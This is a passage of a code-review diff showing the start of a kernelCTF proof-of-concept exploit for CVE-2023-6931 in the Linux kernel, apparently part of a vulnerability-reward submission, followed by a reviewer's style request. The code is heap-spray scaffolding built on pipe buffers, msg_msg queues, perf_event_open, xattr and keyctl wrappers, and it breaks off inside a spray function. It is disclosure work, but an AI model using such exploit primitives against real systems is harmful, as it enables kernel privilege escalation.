pocs/linux/kernelctf/CVE-2023-6931_mitigation/exploit/mitigation-v3b-6.1.55/exploit.c

```diff
@@ -0,0 +1,656 @@
+#define MSG_MSG_HEADER_SIZE sizeof(struct msg_msg)
+#define MSG_MSGSEG_HEADER_SIZE sizeof(struct msg_msgseg)
+
+struct pipeio *pipes[0x100];
+struct pipeio *pipes1[0x10000];
+
+struct pipeio *create_pipeio(void){
+	struct pipeio *pio = (struct pipeio *)calloc(sizeof(struct pipeio), 1);
+	if(pipe((int *)&pio->pipe) < 0)
+		perror("pipe alloc");
+	pio->is_ops_activated = false;
+	return pio;
+}
+
+void resize_pipe(struct pipeio *pipe, uint64_t objectsz){
+	if(fcntl(pipe->pipe.writefd, F_SETPIPE_SZ, objectsz) < 0)
+		perror("pipe resize");
+}
+
+void read_pipe(struct pipeio *pipe, char *buf, uint64_t size){
+	if(read(pipe->pipe.readfd, buf, size) < 0)
+		perror("pipe read");
+}
+
+void write_pipe(struct pipeio *pipe, char *buf, uint64_t size){
+	if(write(pipe->pipe.writefd, buf, size) < 0)
+		perror("pipe write");
+	else
+		pipe->is_ops_activated = true;
+}
+
+void release_pipe(struct pipeio *pipe){
+	if(!pipe)
+		return;
+	close(pipe->pipe.readfd);
+	close(pipe->pipe.writefd);
+	free(pipe);
+}
+
+int alloc_msg_queue(void){
+    int msqid = msgget(IPC_PRIVATE, IPC_CREAT | 0666);
+    if (msqid == -1)
+        perror("msgget");
+    return msqid;
+}
+
+void insert_msg_msg(int msqid, int64_t mtype, uint64_t objectsz, uint64_t msgsz, char *mtext){
+    assert(msgsz <= objectsz);
+    struct msg *msg = (struct msg *)calloc(MSG_HEADER_SIZE + objectsz, 1);
+    msg->m_type = mtype;
+    memset(msg->m_text, '\xbf', objectsz);
+    memcpy(msg->m_text, mtext, msgsz); 
+    if (msgsnd(msqid, msg, objectsz, 0) < 0)
+        perror("msgsnd");
+}
+
+static long
+perf_event_open(struct perf_event_attr *hw_event, pid_t pid, int cpu, int group_group_leader, unsigned long flags){
+    return syscall(SYS_perf_event_open, hw_event, pid, cpu, group_group_leader, flags);
+}
+
+char *gen_xattr_name(char *prefix, char *name){
+    assert(prefix[strlen(prefix) - 1] == '.');
+    char *xattr_name = (char *)calloc(strlen(prefix) + strlen(name) + 1, 1);
+    strcpy(xattr_name, prefix);
+    strcat(xattr_name, name);
+    return xattr_name;
+}
+
+struct xattr_return *read_xattr(char *fname, char *name){
+    struct xattr_return *ret = (struct xattr_return *)calloc(sizeof(struct xattr_return), 1);
+    ret->value = (char *)calloc(0x10000, 1);
+    if((ret->size = getxattr(fname, name, ret->value, 0x10000)) < 0)
+        puts("getxattr error");
+    return ret;
+}
+
+static inline key_serial_t sys_add_key(const char *type, const char *desc, const void *payload, size_t plen, int ringid)
+{
+    return syscall(__NR_add_key, type, desc, payload, plen, ringid);
+}
+
+static inline key_serial_t sys_keyctl(int cmd, ...)
+{
+    va_list ap;
+    long arg2, arg3, arg4, arg5;
+
+    va_start(ap, cmd);
+    arg2 = va_arg(ap, long);
+    arg3 = va_arg(ap, long);
+    arg4 = va_arg(ap, long);
+    arg5 = va_arg(ap, long);
+    va_end(ap);
+
+    return syscall(__NR_keyctl, cmd, arg2, arg3, arg4, arg5);
+}
+
+void spray(){
+    char *fname = "/tmp/zzlol";
```

Comment:
Please refactor and/or rewrite your code and make it clearer what you are building here following our [style guide](https://google.github.io/security-research/kernelctf/style_guide#sprayed-and-leaked-structures).